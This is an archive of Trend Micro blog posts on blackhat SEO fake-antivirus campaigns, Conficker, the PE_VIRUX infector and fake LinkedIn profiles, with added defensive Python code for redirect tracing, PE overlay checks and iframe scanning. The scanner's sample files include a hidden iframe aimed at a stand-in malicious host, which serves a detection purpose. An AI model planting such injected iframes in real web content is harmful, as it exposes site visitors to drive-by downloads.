
    Author Archive - Macky Cruz (Technical Communications)

    Cybercriminals take the low road once again as they pepper the Internet with blackhat SEO links that are likely to attract users searching for news about the death of Charlie’s Angels star Farrah Fawcett, who, at age 62, finally ended a long struggle with cancer.

    Figure 1. Blackhat SEO links for Farrah Fawcett searches set in

    Hosted on is-the-boss domains (last seen in the H1N1 blackhat SEO attack), the links that come up in search results redirect to other URLs that eventually land on all-too-familiar territory: a rogue antivirus download.

    In one specific infection chain traced by Research Manager Ivan Macalintal, the initial link redirects to another URL in the same domain, which then redirects to a further URL that performs referrer checks before unfolding its contents. This is an evasion technique used by cybercriminals to avoid analysis by security researchers and to avoid being crawled (and rated) by search engines.

    Once the requester is cleared, the URL redirects to two more URLs before finally landing on a download page (within a certain thesecuritytools domain, now blocked by Trend Micro). The page downloads install.exe, which is a rogue antivirus detected as TROJ_FAKEAV.BBM.
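    The referrer-gated redirect chain described above is the reason an analyst who fetches the gated URL directly sees nothing. The following added example (not code from the original post or from Trend Micro) walks a chain one hop at a time, sending the previous hop as Referer the way a browser would, and records every hop and status. The hostnames, paths and the fake_fetch responses are constructed placeholders; urllib_fetch is an optional real fetcher that uses HEAD requests and never retrieves the final payload.

```python
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

# Hypothetical fetch signature used by this example: (url, request headers) -> (status, response headers),
# with redirects NOT followed automatically.
Fetch = Callable[[str, Dict[str, str]], Tuple[int, Dict[str, str]]]

REDIRECT_CODES = (301, 302, 303, 307, 308)


def walk_redirects(start: str, fetch: Fetch, referer: Optional[str] = None,
                   max_hops: int = 10) -> List[Tuple[str, int]]:
    """Record each hop of a redirect chain; the previous hop is sent as Referer."""
    chain: List[Tuple[str, int]] = []
    url, prev = start, referer
    for _ in range(max_hops):
        headers = {"Referer": prev} if prev else {}
        status, resp = fetch(url, headers)
        chain.append((url, status))
        location = resp.get("Location")
        if status not in REDIRECT_CODES or not location:
            break
        url, prev = location, url
    return chain


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface 3xx responses to the caller instead of following them


def urllib_fetch(url: str, headers: Dict[str, str]) -> Tuple[int, Dict[str, str]]:
    """Real fetcher for sandboxed analysis: HEAD only, redirects surfaced, nothing downloaded."""
    req = urllib.request.Request(url, headers=headers, method="HEAD")
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=10) as r:
            return r.status, dict(r.headers)
    except urllib.error.HTTPError as e:
        return e.code, dict(e.headers)


# Constructed offline stand-in for the chain in the post (placeholder hosts, not the real ones).
SITE = "http://is-the-boss.example"
GATE = "http://gate.example/check"
LANDING = "http://thesecuritytools.example/download"
CHAIN = {
    f"{SITE}/a": (302, {"Location": f"{SITE}/b"}),
    f"{SITE}/b": (302, {"Location": GATE}),
    "http://hop.example/c": (302, {"Location": LANDING}),
    LANDING: (200, {"Content-Type": "text/html"}),
}


def fake_fetch(url: str, headers: Dict[str, str]) -> Tuple[int, Dict[str, str]]:
    if url == GATE:  # referrer check: only requests arriving from the expected hop get through
        if headers.get("Referer") == f"{SITE}/b":
            return 302, {"Location": "http://hop.example/c"}
        return 404, {}
    return CHAIN.get(url, (404, {}))


if __name__ == "__main__":
    for hop in walk_redirects(f"{SITE}/a", fake_fetch):
        print(hop)
    print("direct:", walk_redirects(GATE, fake_fetch))
```

    Starting from the first search-result link reproduces all five hops down to the download page, while starting at the gated URL with no Referer yields a single 404, which is exactly the evasion the post describes.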

    As this report is being written our engineers are analyzing the behavior of this malware. Trend Micro Smart Protection Network already blocks malicious URLs related to this attack.

    Not long after news of Farrah Fawcett’s passing hit mainstream news, singer/entertainer Michael Jackson likewise met an untimely death. Users are advised to exercise extreme caution in searching for related news and information surrounding the deaths of these celebrities.

    One of the more famous blackhat SEO manipulation attacks we have documented thus far is the attack that happened shortly after Heath Ledger’s death.

    Update (2:30 am (UTC-7)): TROJ_FAKEAV.BBM behaves much like the other rogue antivirus programs we’ve seen to date. Here’s a screenshot of its “scanning window”:

    Figure 2. The rogue antivirus program’s window

    Users who have the misfortune of coming across “System Security Antivirus” are advised to run their legitimate antivirus if this makes an appearance on their system.


    There have been some concerns over whether another new Conficker variant (DOWNAD for Trend Micro) has been released or not. Recall that in January we witnessed cybercriminals update WORM_DOWNAD.A's routines so that it could propagate via more channels, becoming WORM_DOWNAD.AD. Reports talk of yet more updated functionality in a more recent Conficker run.

    This variant, which we also detect as WORM_DOWNAD.AD, has brought in two new paths for binary validation and execution. Both bypass the use of Internet rendezvous points which, for the earlier variant, are used by bot masters to make contact with DOWNAD drones for tracking or new payload updates:

    • One path is in an extension to netapi32.dll which checks for URLs in RPC traffic. If valid, the file from the URL is downloaded, and if the file is valid for the malware’s purposes, the file is executed.
    • The other new path is when the malware creates a named pipe which it will use to receive any URL sent by the botmaster, much like a backdoor. The malware reads from the named pipe and, if the read does not return an error, passes the URL to another function which will then download, validate and execute a file.

    Fortunately for Trend Micro users, Smart Protection Network has been protecting their computers early on since Trend Micro also detects this malware as WORM_DOWNAD.AD. Infected users should read and follow the instructions at the solution page for this malware here. We also provide a fixtool which can likewise help non-Trend Micro users.

    Conficker/DOWNAD entries here:


    Feb 10, 10:25 pm (UTC-7)

    There are an increasing number of reports from several countries about a complex file infector with several infection routines. Arriving via the Internet, this new strain bypasses the Windows Firewall, infects files using several infection techniques, and uses more than one layer of encryption. The US seems to be the most affected of all regions as of this writing.

    Typical file infectors choose any of the following infection styles:

    • cavity – the virus inserts its code into available spaces within the normal file
    • appending – the virus inserts its code after the normal file’s code
    • prepending – the virus inserts its code before the normal file’s code
    • entry-point obscuring – a complex infection technique used to evade immediate detection
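    Two of the infection styles listed above leave traces that can be checked without running the file: an appending infector leaves data past the end of the last PE section (an "overlay"), and entry-point obscuring often leaves AddressOfEntryPoint pointing outside every section. The following added example (not code from the original post or from Trend Micro) parses the PE headers directly and reports both heuristics. build_minimal_pe constructs a toy one-section PE32 image so the check runs offline; it is a constructed sample, not a real program or a malware sample.

```python
import struct

FILE_ALIGN = 0x200  # file alignment used by the constructed sample below


def _locate_headers(data: bytes):
    """Return (optional-header offset, section-table offset, section count) or raise."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    return opt, opt + opt_size, num_sections


def overlay_size(data: bytes) -> int:
    """Bytes past the end of the last section's raw data (where appending infectors park code)."""
    _, sect, n = _locate_headers(data)
    end = sect + 40 * n  # at minimum the headers themselves are content
    for i in range(n):
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return max(0, len(data) - end)


def entry_point_in_section(data: bytes) -> bool:
    """False when AddressOfEntryPoint lies outside every section (an entry-point obscuring hint)."""
    opt, sect, n = _locate_headers(data)
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    for i in range(n):
        vsize, va, rsize = struct.unpack_from("<III", data, sect + 40 * i + 8)
        if va <= entry < va + max(vsize, rsize):
            return True
    return False


def build_minimal_pe(section_data: bytes, entry_rva: int = 0x1000) -> bytes:
    """Construct a toy one-section PE32 image (constructed sample, not a real program)."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 224
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)  # AddressOfEntryPoint
    headers_len = e_lfanew + 4 + len(coff) + opt_size + 40
    raw_ptr = -(-headers_len // FILE_ALIGN) * FILE_ALIGN
    raw_size = -(-len(section_data) // FILE_ALIGN) * FILE_ALIGN
    section = struct.pack("<8sIIIIIIHHI", b".text", len(section_data), 0x1000,
                          raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
    image = bytearray(dos + b"PE\x00\x00" + coff + opt + section)
    image += b"\x00" * (raw_ptr - len(image))
    image += section_data + b"\x00" * (raw_size - len(section_data))
    return bytes(image)


def triage(data: bytes) -> dict:
    """Summarise both heuristics for one file image."""
    return {"overlay_bytes": overlay_size(data),
            "entry_in_section": entry_point_in_section(data)}


if __name__ == "__main__":
    clean = build_minimal_pe(b"\x90" * 100)
    appended = clean + b"\xCC" * 64                         # constructed: data glued after the last section
    epo = build_minimal_pe(b"\x90" * 100, entry_rva=0x9000)  # constructed: entry point outside any section
    for name, img in (("clean", clean), ("appended", appended), ("epo", epo)):
        print(name, triage(img))
```

    Both results are triage hints rather than verdicts: installers, self-extracting archives and Authenticode-signed binaries legitimately carry overlays, so an overlay is a reason to look closer (for instance, compare the file against a known-good copy), not a detection on its own.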

    The VIRUX strain, however, uses the following infection schema:


    Figure 1. PE_VIRUX hunts down target files and infects them using more than one infection technique and sometimes more than one encryption routine

    It can and will infect both .EXE and .SCR files using the above scheme, turning them into PE_VIRUX variants themselves. The ultimate payload might explain the pains that the cybercriminals took to make cleaning PCs of this infection difficult: this file infector connects to IRC servers, after which it joins a channel to receive and execute commands on the affected PC. It is “anything goes” from there.

    PE_VIRUX.A also connects to websites to download files. A little earlier this week it was downloading TROJ_INJECTOR.AR, however, a few hours after that the URL began downloading another PE_VIRUX variant.

    Apart from the above routine, PE_VIRUX also infects script files. For script files (.PHP, .ASP, and .HTML), PE_VIRUX inserts malicious IFrame code, which is automatically loaded when the script files are opened. Trend Micro detects infected scripts as HTML_IFRAME.NV. This greatly extends its reach: if the script files happen to be uploaded to a publicly accessible website, any visitor to the affected site will be led to the URL embedded in the iFrame code. Undoubtedly malicious, the said URL automatically downloads HTML_XPLOIT.V onto the system, which in turn downloads PE_VIRUT.BO.
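    Because the injected IFrame spreads the infection to every visitor once the file reaches a web server, web administrators want a quick way to sweep .PHP, .ASP and .HTML content for the telltale pattern: an iframe that points off-site and is sized or styled to be invisible. The following added scanner (not code from the original post or from Trend Micro; the file contents and hostnames are constructed samples) flags exactly that combination and leaves ordinary embedded iframes alone.

```python
import re
from typing import Dict, List
from urllib.parse import urlparse

# Constructed sample of web files keyed by path; the iframe lines stand in for injected content.
SAMPLE_FILES = {
    "index.html": (
        "<html><body><h1>Welcome</h1>\n"
        '<iframe src="http://malicious.example/in.php" width="0" height="0" frameborder="0"></iframe>\n'
        "</body></html>"
    ),
    "contact.php": '<?php echo "hi"; ?>\n<iframe src="/embed/map" width="400" height="300"></iframe>',
    "about.asp": '<% Response.Write("x") %>\n<IFRAME src="http://cdn.example/player" style="display: none"></IFRAME>',
    "news.html": '<iframe src="http://video.example/clip" width="640" height="360"></iframe>',
}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# attribute = "quoted" | 'quoted' | bare
ATTR_RE = re.compile(r"""([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)


def parse_attrs(tag: str) -> Dict[str, str]:
    """Lower-cased attribute map for one opening tag."""
    out = {}
    for name, dq, sq, bare in ATTR_RE.findall(tag):
        out[name.lower()] = dq or sq or bare
    return out


def is_suspicious(tag: str, site_host: str) -> bool:
    """Off-site target combined with zero/one-pixel size or a hiding style."""
    attrs = parse_attrs(tag)
    src = attrs.get("src", "")
    host = urlparse(src).hostname or site_host  # relative src stays on our own site
    off_site = host.lower() != site_host.lower()
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    style = attrs.get("style", "").replace(" ", "").lower()
    hidden = "display:none" in style or "visibility:hidden" in style
    return off_site and (tiny or hidden)


def scan_files(files: Dict[str, str], site_host: str) -> Dict[str, List[str]]:
    """Map each file path to the suspicious iframe tags found in it (files with none are omitted)."""
    hits: Dict[str, List[str]] = {}
    for path, content in files.items():
        bad = [t for t in IFRAME_RE.findall(content) if is_suspicious(t, site_host)]
        if bad:
            hits[path] = bad
    return hits


if __name__ == "__main__":
    for path, tags in scan_files(SAMPLE_FILES, "www.example.org").items():
        print(path)
        for t in tags:
            print("   ", t)
```

    The heuristic deliberately requires both conditions: a large, visible off-site iframe (an embedded video player, say) is normal web content, while a zero-size or hidden one pointing to a foreign host has no legitimate reason to exist in a static page and should be quarantined and compared against a clean backup.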

    PE_VIRUT.BO, on the other hand, when cleaned, becomes TROJ_VIRUX.A. This Trojan connects to websites, which, as of this writing, are inaccessible, but may go live any time.

    PE_VIRUX variants also infect files of the same file types located in all of the infected PC’s physical drives, folders and subfolders.


    Figure 2. PE_VIRUX Infection Diagram

    Readers may recall a file infector of a similar name, PE_VIRUT, which likewise wreaked havoc due to its nasty infection routines. See the following blog entries discussing this threat:

    While we are careful in noting the similarities between the two, TrendLabs engineers are quick to point out that VIRUX is indeed a notch higher than VIRUT in terms of complexity (which is the cybercriminals’ bid for malware persistence and increasing likelihood of reinfection).

    TrendLabs engineers are working on an in-depth analysis of this malware. Trend Micro Smart Protection Network blocks all URLs related to this entire attack, ensuring users are protected from ever accessing them. See the complete malware description of PE_VIRUX.A at its Virus Encyclopedia entry.


    The LinkedIn professional networking site connects more than 30 million users from across many different industries. The advantages of maintaining a list of trusted business contacts for career planning purposes are not lost on LinkedIn's users.

    The fostering of business relationships is further enhanced by features such as LinkedIn Answers and access from mobile devices.

    Advanced Threats Researcher Ivan Macalintal found some bogus LinkedIn profiles which contain links to malware, using the names and images of famous personalities such as:

    • Beyoncé Knowles
    • Victoria Beckham
    • Christina Ricci
    • Kirsten Dunst
    • Salma Hayek
    • Kate Hudson

    … and several others.

    Below is a screenshot of the previously mentioned fake Beyoncé LinkedIn profile, with malicious links highlighted:


    Bogus Profile of Beyoncé Knowles

    Malicious links contained in these bogus profiles lead browsers through a series of redirections, but ultimately to malware.

    Note that there are several routes this infection path may take. We are conducting a deeper investigation of these attacks in order to best provide detection and protection against these threats. We will update this blog entry with additional information when it is available.

    Update as of January 6 2008, 10:00 PM PST

    The malicious file downloaded from the links contained in the mentioned fake profiles is detected by Trend Micro as TROJ_DLOAD.ML. Upon execution, TROJ_DLOAD.ML accesses certain URLs to download files detected as the following:

    • TROJ_DLOAD.PN
    • TROJ_DLOAD.PI
    • TROJ_DLOAD.PG

    In turn, these files attempt to download a fake antivirus application detected by Trend Micro as TROJ_FAKEAV.GDS.

    Cybercriminals are said to be using pre-registered accounts on social networks as launchpads for this type of attack. Such pre-registered accounts are reportedly being sold in the black market today.

    Update as of January 8 2008, 7:00 AM PST

    Reports suggest that the previously mentioned pre-registered accounts are sold in black markets by the hundreds. The accounts are then used to send spam inside affected social networks.

    Update as of January 15 2008

    Analysis by Trend Micro researchers reveals that TROJ_FAKEAV.GDS has the following routines:

    Upon execution, it displays the following GUI:


    Figure 1. Fake antivirus software GUI

    It also displays an icon on the system bar and a fake message alert:


    Figure 2. Alarming warnings designed to rattle the user

    When the user clicks the abovementioned message alert, the following fake Microsoft Security Center GUI is displayed:


    Figure 3. Fake Microsoft Security Center GUI

    Furthermore, clicking any link on the abovementioned Microsoft Security Center GUI will display the following prompt for registration:


    Figure 4. Users are asked to register to be able to rid their system of viruses allegedly affecting it


    We gathered malware data from January to November 2008 to give us an idea of just how dangerous surfing the Internet is. We analyzed the arrival methods of the top 100 malware infecting the most number of systems for the said period and came up with the following statistics:

    Figure 1. Infection Vectors of Top 100 Malware

    Coverage: Malware Analyzed by Trend Micro Researchers
    Date Range: January 1, 2008 to November 25, 2008

    This allows us to make some interesting insights:

    1. Globally, the source of the most number of infections for these top 100 malware is the Internet, specifically in surfing unknown or malicious sites, or accepting links offered in unsolicited email.
    2. The second highest source of infections is the presence of other malware on already infected systems. Since threats today are multicomponent, malware routines frequently include retrieving files from remote locations and downloading them onto the PC for added functionality or stealth.
    3. The third highest source of infections is the opening of email attachments that come from unknown or malicious sources.
    4. The percentages do not add up to 100% because most malware we have analyzed arrive on systems using more than one infection vector. This reflects the inherent flexibility of using the Internet: a Trojan may be hosted on a malicious website, which can reach a target system through (1) a spammed email containing a link to the Trojan, (2) direct download by accidentally surfing malicious sites (in search of, say, application cracks), (3) drive-by downloads (as in visiting a hacked legitimate site which has scripts that download and execute the Trojan automatically on visitors’ PCs), or (4) as a file downloaded by other Trojans already on the system.

    Regional data reflects the same general trend:

    Although overall still the land of adware, North America’s threat profile includes data-stealing malware that arrive via the Web.

    Figure 2. Infection Vectors of Top Malware in North America

    Malware borne by removable drives (portable / external hard drives, thumb drives, flash disks, memory cards, etc.) are at 15% in Asia and Australia. Most Asian countries have autorun malware as their top infectors, the highest concentration compared to other regions. However, the prevalence of file infectors and online gaming spyware in China has diluted this profile.

    Figure 3. Infection Vectors of Top Malware in Asia and Australia

    The top malware infecting PCs in Europe, Middle East and Africa (EMEA) also included several autorun malware, although in terms of number of PCs infected by any one malware, notorious Trojan downloaders are prominent in this region. EMEA also registered several infections via malicious iframes.

    Figure 4. Infection Vectors of Top Malware in Europe, Middle East and Africa

    Latin America’s top threats are varied in profile, but the persistence of multicomponent attacks is distinctly apparent. Several malware found on PCs have in fact been dropped by other malware already present on the PC.

    Figure 5. Infection Vectors of Top Malware in Latin America

    Note however that this is not representative of the profiles of all malware samples; admittedly nobody can lay such a claim on any existing data set. What we are saying is that a majority of the top 100 malware that were most prevalent during this year arrived by surfing malicious or unknown sites. A sad confirmation that despite all awareness campaigns for safe computing, users still tend to victimize themselves out of curiosity.


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice